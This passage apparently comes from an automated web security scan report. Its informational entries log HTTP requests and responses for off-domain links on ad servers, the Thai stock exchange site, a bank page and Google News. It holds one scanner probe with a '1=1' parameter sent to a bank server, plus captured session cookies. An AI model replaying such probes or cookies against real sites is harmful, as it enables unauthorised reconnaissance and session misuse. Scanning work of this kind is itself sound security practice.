<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///D:/cdn/2011/05/02/dork/sql-injection-http-put-injection-xss-traversal-weak-configuration-ghdb.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.checkmarx.com%26adT%3DSQL%2BInjection%2BTutorial%26adU%3Dwww.FireHost.com/Cloud-Hosting%26adT%3DSecure%2BCloud%2BHosting%26adU%3Dvulnerability.scan.qualys.com%26adT%3DOnline%2BVulnerability%2BScan%26gl%3DUS&amp;usg=AFQjCNFZATHIFickhw0_KrTe6kiwyscFXw" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

22.13. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-7912187763300211&output=html&h=240&slotname=4561224372&w=120&lmt=1278669650&flash=0&url=http%3A%2F%2Fwww.set.or.th%2Fen%2Fproducts%2Findex%2Fsetindex_p1.html&dt=1304449116086&bpp=2&shv=r20110427&jsv=r20110427&correlator=1304449118371&frm=0&adk=2300911850&ga_vid=407703298.1304448074&ga_sid=1304448074&ga_hid=2050278855&ga_fc=1&u_tz=-300&u_his=6&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=5&u_nmime=39&biw=1005&bih=852&ref=http%3A%2F%2Fwww.set.or.th%2Fen%2Fregulations%2Fcg%2Froles_p1.html&fu=0&ifi=1&dtd=4325&xpc=kCaOuAZijd&p=http%3A//www.set.or.th HTTP/1.1
Host: googleads.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/products/index/setindex_p1.html
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 03 May 2011 13:58:43 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 10147

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#000000;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</div><img alt="" height=11 id=ainw src="http://pagead2.googlesyndication.com/pagead/images/ainw_000000.gif" width=11><div id=att>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.set.or.th/en/products/index/setindex_p1.html%26hl%3Den%26client%3Dca-pub-7912187763300211%26adU%3Dwww.hiddenvaluesalert.com%26adT%3DStock%2Bto%2Bbuy%2Bby%2B5/31/11%26gl%3DUS&amp;usg=AFQjCNEiNEn_gySo9f3SwJFetBzcrkIQ5Q" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

22.14. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1304487764&flash=10.2.154&url=file%3A%2F%2F%2FD%3A%2Fcdn%2F2011%2F05%2F02%2Fdork%2Fsql-injection-http-put-injection-xss-traversal-weak-configuration-ghdb.html&dt=1304469762603&bpp=5&shv=r20110427&jsv=r20110427&correlator=1304469764022&frm=0&adk=1607234649&ga_vid=1018949351.1304469765&ga_sid=1304469765&ga_hid=964189396&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1043&bih=887&fu=0&ifi=1&dtd=6538&xpc=zGun9pVDff&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 03 May 2011 19:42:51 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12574

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///D:/cdn/2011/05/02/dork/sql-injection-http-put-injection-xss-traversal-weak-configuration-ghdb.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.Moxiesoft.com%26adT%3DKnowledge%2BBase%2BSoftware%26adU%3Dwww.FireHost.com/Cloud-Hosting%26adT%3DSecure%2BCloud%2BHosting%26adU%3Dwww.acunetix.com/free-edition/%26adT%3DSQL%2BInjection%2Bscanner%26gl%3DUS&amp;usg=AFQjCNFXr2zzPJR9jLI2iVFwtAv4EIlRLw" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

22.15. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1304483671&flash=10.2.154&url=file%3A%2F%2F%2FD%3A%2Fcdn%2F2011%2F05%2F02%2Fdork%2Fsql-injection-http-put-injection-xss-traversal-weak-configuration-ghdb.html&dt=1304465669906&bpp=5&shv=r20110427&jsv=r20110427&correlator=1304465671270&frm=0&adk=1607234649&ga_vid=691042865.1304465673&ga_sid=1304465673&ga_hid=1511037852&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1043&bih=887&eid=33895150&fu=0&ifi=1&dtd=7230&xpc=KpV9TZhe7D&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 03 May 2011 18:34:39 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12993

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///D:/cdn/2011/05/02/dork/sql-injection-http-put-injection-xss-traversal-weak-configuration-ghdb.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DSearch.Technology-Schools.com%26adT%3DLearn%2BSQL%2BOnline%26adU%3Dwww.lynda.com/learn/MySQL%26adT%3DLearn%2BSQL%2BOnline%26adU%3DBusiness-Software.com/ContentMgmt%26adT%3DTop%2B10%2BContent%2BManagement%26gl%3DUS&amp;usg=AFQjCNGqgKqg5daBPbN5wXVpugWPbNFtew" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

22.16. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1304484904&flash=10.2.154&url=file%3A%2F%2F%2FD%3A%2Fcdn%2Fexamples%2Fdork%2Fxss%2Fxss-dork-sql-injection-header-injection.html&dt=1304466903365&bpp=3&shv=r20110427&jsv=r20110427&correlator=1304466904781&frm=0&adk=1607234649&ga_vid=1175379471.1304466907&ga_sid=1304466907&ga_hid=833377022&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1043&bih=887&eid=33895150&fu=0&ifi=1&dtd=3585&xpc=IFxVOfOjCp&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 03 May 2011 18:55:09 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12386

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///D:/cdn/examples/dork/xss/xss-dork-sql-injection-header-injection.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dvulnerability.scan.qualys.com%26adT%3DFree%2BOnline%2BNetwork%2BScan%26adU%3Dwww.Neotys.com%26adT%3DWeb%2BStress%2BSoftware%26adU%3Dwww.ironspeed.com%26adT%3DFree%2B.NET%2Bcode%2Bgenerator%26gl%3DUS&amp;usg=AFQjCNGWopFj8nuw20AJm-LL4KwKGhGTnw" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

22.17. http://marketdata.set.or.th/mkt/topten.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://marketdata.set.or.th
Path:   /mkt/topten.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /mkt/topten.do?language=en&country=US HTTP/1.1
Host: marketdata.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/sitemap/for_listing.html
Cookie: _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:59:43 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=tis-620
Content-Language: en-US
Set-Cookie: JSESSIONID=23A1B718BE31C3B5E88C96682836394A; Path=/mkt
Content-Length: 57003


<html>
<head>
<link href="/mkt/styles/setstyle.css;jsessionid=23A1B718BE31C3B5E88C96682836394A" rel="stylesheet" type="text/css">
<link href="/menuFile/framework.css" rel="stylesheet" t
...[SNIP]...
<!-- AddThis Button BEGIN -->
&nbsp;&nbsp;<a class="addthis_button" href="http://www.addthis.com/bookmark.php?v=250&amp;username=setwebadmin"><img src="http://s7.addthis.com/static/btn/v2/lg-share-en.gif" width="125" height="16" alt="Bookmark and Share" style="border:0"/></a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=setwebadmin"></script>
...[SNIP]...
</script>
<script language="javascript1.1" src="http://hits.truehits.in.th/data/c0002486.js"></script>
<!-- END WEBSTAT CODE -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

22.18. http://moneytalk.scb.co.th/index.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moneytalk.scb.co.th
Path:   /index.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

NETSPARKER /index.asp?FileName=TH&1=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: moneytalk.scb.co.th
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 403 Forbidden
Content-Length: 1758
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 18:05:20 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be displayed</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html;
...[SNIP]...
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a>
...[SNIP]...
<li>In the IIS Software Development Kit (SDK) or at the <a href="http://go.microsoft.com/fwlink/?LinkId=8181">MSDN Online Library</a>
...[SNIP]...

22.19. http://news.google.com/news/story  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.google.com
Path:   /news/story

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /news/story?hl\\x3den\\x26amp;sugexp\\x3dldymls\\x26amp;pq\\x3dbarkley+bank\\x26amp;xhr\\x3dt\\x26amp;q\\x3dthailand+bank\\x26amp;cp\\x3d13\\x26amp;biw\\x3d1059\\x26amp;bih\\x3d903\\x26amp;bav\\x3don.2,or.r_gc.r_pw.\\x26amp;um\\x3d1\\x26amp;ie\\x3dUTF-8\\x26amp;ncl\\x3ddf6Is-O84Pe-BjMyKuzjZUjVRu7HM\\x26amp;ei\\x3dc-q_TeOKIJKutwek4eyrBQ\\x26amp;sa\\x3dX\\x26amp;oi\\x3dnews_result\\x26amp;ct\\x3dmore-results\\x26amp;resnum\\x3d6\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CE8QqgIwBQ\\x22 HTTP/1.1
Host: news.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=46=HfFdn9n5LQSBV_6qMo8w5eh1JPxJ22N4d7ME-n4CpoG0Pt1fAvuZFMASF-UtF6oB21IuFyfkLpYaH0m_T3hMrA31Aueqwtif5xnsXw2EUw1C8kNgsQLLVpzPIAlyXsyf; PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Tue, 03 May 2011 13:24:32 GMT
Expires: Tue, 03 May 2011 13:24:32 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/h
...[SNIP]...
</title>
<link href="http://www.gstatic.com/news/img/favicon.ico" rel="icon" type="image/x-icon">
<link rel="alternate" type="application/rss+xml" href="http://news.google.com/news?pz=1&amp;cf=all&amp;ned=us&amp;hl=en&amp;topic=h&amp;num=3&amp;output=rss">
...[SNIP]...
<li class=gbmtc><a class=gbmt id=gb_36 onclick="gbar.qs(this);gbar.logger.il(1,{t:36})" href="http://www.youtube.com/?hl=en&tab=n1">YouTube</a>
...[SNIP]...
<a href="/news?pz=1&amp;ned=us"><img src="http://www.gstatic.com/news/img/logo/en_us/news.gif" width="171" height="40" alt="Google News"></a>
...[SNIP]...
<span class="sel"><img class="chip nav-0" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=ss&amp;ict=ln" class="persistentblue"><img class="chip nav-ss" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>Starred<img class="icon star-icon star-nav starred" alt="" src="http://www.gstatic.com/news/img/cleardot.gif"></span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=w&amp;ict=ln" class="persistentblue"><img class="chip nav-w" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;geo=detect_metro_area&amp;ict=ln" class="persistentblue"><img class="chip nav-1" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=n&amp;ict=ln" class="persistentblue"><img class="chip nav-n" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=b&amp;ict=ln" class="persistentblue"><img class="chip nav-b" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=t&amp;ict=ln" class="persistentblue"><img class="chip nav-t" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=e&amp;ict=ln" class="persistentblue"><img class="chip nav-e" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=s&amp;ict=ln" class="persistentblue"><img class="chip nav-s" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=m&amp;ict=ln" class="persistentblue"><img class="chip nav-m" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=ir&amp;ict=ln" class="persistentblue"><img class="chip nav-ir" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<div id="rhc-toggler" class="rhc-toggler"><img id="rhc-toggler-image" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" class="icon rhc-toggler-icon expanded"></div>
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.mirror.co.uk/news/top-stories/2011/05/03/osama-bin-laden-pakistan-has-difficult-balancing-act-to-maintain-115875-23103427/" class="usg-AFQjCNFUXrwDCQZ2SJeA8frkCnnUArXu-w did-b315965e120f7503 article" title="Mirror.co.uk"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/pJMnF-WzvvPYRM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.mirror.co.uk/news/top-stories/2011/05/03/osama-bin-laden-pakistan-has-difficult-balancing-act-to-maintain-115875-23103427/" class="usg-AFQjCNFUXrwDCQZ2SJeA8frkCnnUArXu-w did-b315965e120f7503 article"> Mirror.co.u... </a>
...[SNIP]...
<h2 class="title sel"> <a target="_blank" class="usg-AFQjCNGwHPM7IlEKIyLvuYI034d5UF__FA did-b315965e120f7503 article" href="http://abcnews.go.com/Technology/osama-bin-ladens-death-leads-cyber-scams-spam/story?id=13513179" id="MAA4AEgAUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=Mdu2wS3FiYA">Video:&nbsp;
MI former Navy Seal explains process
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://feeds.washingtonpost.com/click.phdo?i=4c34e127dc9e5d8fcec6c9f865aebb9e" target="_blank" class="usg-AFQjCNEYIbxmR2s1QVT7rBxP9fbfgl8N9w did-2098850c439c7451 article" id="MAA4AEgAUAFgAmoCdXM">Secretive Virginia SEALs thrill community by taking down bin Laden</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHiABPUR-R7_oXtK4nUzmio1kfa8g did-fe8e0fdb5f306536 article" href="http://www2.jcfloridan.com/news/2011/may/03/bin-ladens-death-causes-mixed-emotions-ar-1793477/" id="MAA4AEgAUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGyecV1aNvqpS-RYZMAEZ-Ez9d-Ww did-a52848d16aff8f92 article" href="http://content.usatoday.com/communities/ondeadline/post/2011/05/bin-laden-raid-hits-intelligence-jackpot/1" id="MAA4AEgAUANgAmoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHzWctJgYzinkBiO6wCAlQIN7yNIw did-c2c5c0fdb8bf61f9 article" href="http://www.620wtmj.com/shows/genemueller/121148894.html" id="MAA4AEgAUAVgAmoCdXM"><span class="titletext">
...[SNIP]...
<span class="wikisense-link">&nbsp;- <a target="_blank" href="http://en.wikipedia.org/wiki/Death_of_Osama_bin_Laden" class="usg-AFQjCNFV9tcdpVpVrVL8EIV_4G3N_Bwltg ">Wikipedia:&nbsp;Death of Osama bin Laden</a>
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.taiwantoday.tw/ct.asp?xItem=162475&amp;ctNode=445" class="usg-AFQjCNEiU7_ngtp5MzPum9TOg-L33xvUjA did-f91bcda6d545e1b4 article" title="Taiwan Today"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/x6AGCs46xI3LnM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.taiwantoday.tw/ct.asp?xItem=162475&amp;ctNode=445" class="usg-AFQjCNEiU7_ngtp5MzPum9TOg-L33xvUjA did-f91bcda6d545e1b4 article"> Taiwan Toda... </a>
...[SNIP]...
<h2 class="title sel"> <a target="_blank" class="usg-AFQjCNH2nT75dG_iHHOyix7_u4rKx_CNhA did-f91bcda6d545e1b4 article" href="http://blogs.wsj.com/indiarealtime/2011/05/03/bin-laden-death-could-raise-risks-for-reporters/" id="MAA4AEgBUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.voanews.com/english/news/Global-Press-Freedom-at-Lowest-Level-in-More-Than-Decade-121097179.html" target="_blank" class="usg-AFQjCNHEdglA-ybS7NRIad53nogBA7ObRQ did-89015a8d8a9f479e article" id="MAA4AEgBUAFgAmoCdXM">Global Press Freedom at Lowest Level in More Than Decade</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.csmonitor.com/World/Americas/2011/0502/Mexican-press-tagged-not-free-amid-drug-war-violence-self-censorship" target="_blank" class="usg-AFQjCNEBsbYWToU1DhfHrLPPDnxZzoq8tw did-bb1e1624bcade025 article" id="MAA4AEgBUAJgAmoCdXM">Mexican press tagged &#39;not free&#39; amid drug war violence, self-censorship</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFfgjQ0xfSLYj6AXQGh6cvnHG9dfw did-800860031e485670 article" href="http://news.myjoyonline.com/news/201105/65180.asp" id="MAA4AEgBUARgAmoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGw-06xEtdqjFejsVkUPRtSAlQEeA did-633389385a2c10bb article" href="http://allafrica.com/stories/201105030047.html" id="MAA4AEgBUAVgAmoCdXM"><span class="titletext">
...[SNIP]...
